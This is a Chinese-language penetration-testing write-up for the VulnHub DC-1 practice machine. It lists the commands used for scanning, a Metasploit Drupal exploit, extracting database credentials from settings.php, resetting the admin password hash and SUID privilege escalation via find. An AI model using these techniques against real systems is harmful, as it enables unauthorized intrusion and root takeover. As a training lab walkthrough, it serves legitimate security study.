DC-1靶机渗透记录
准备工作
在vulnhub官网下载DC:1靶机
导入到vmware
0x01实验环境
DC-1靶机ip:192.168.1.6
攻击机IP:192.168.1.8
0x02 信息收集
Nmap进行扫描
nmap -A -T4 -sV 192.168.1.6 对目标进行攻击性、版本扫描
显示开放80、22,111端口
0x02 开始渗透
先访问80端口
发现有登录,注册,找密码功能。经过测试发现可以注册账号,但是无法登录,找回密码模块无法使用,登录框无报错,万能密码无反应,且数据包记录登录次数,无法暴力破解。
对使用dirsearch网站进行目录扫描
dirsearch -u http://192.168.1.6/
这些信息在网站的robots文件中也有
这些目录进入都需要权限,没有什么实际性作用,
只能去搜搜有没有框架漏洞,这个站点使用的是Drupal CMS使用MSF搜索一下
发现有这几个,但是发现只有第三个可以使用
use 2
set rhost 192.168.1.6
run
成功获取到shell
ls查看当前目录文件,发现flag1.txt
Every good CMS needs a config file - and so do you.
直接明示我们查看该CMS的配置文件。
Drupal的配置文件在
/sites/default/settings.php
查看该文件
直接给出我们flag2以及数据库连接密码。
尝试用 mysql -udbuser -pR0ck3t
发现可以登录进来,但是在使用命令时发现会爆出错误,因为这时候我们获取的shell不是交互式shell,
使用python创建交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
成功登录 并查看数据库
发现存有用户的表,查询发现管理员账户,但是加密方法未知。
经过翻阅文章 Drupal密码重置 尝试修改damin密码
php ./scripts/password-hash.sh admin
pdate users set pass='$S$DXvq/CqunstW/rjh.xMKA9iGHs/fnvAQLBAvoCTkTNeKlfl0CDhB' where uid=1;
使用admin admin 成功进入后台找到flag3
查看passwd文件
获取flag4以及提示
使用Suid提权
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。
以下三个命令都可以用来查找有suid权限的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
发现find命令具有suid权限
提权成功,注意:find 要查找的文件必须是存在的,否则会报错。
查看最终的flag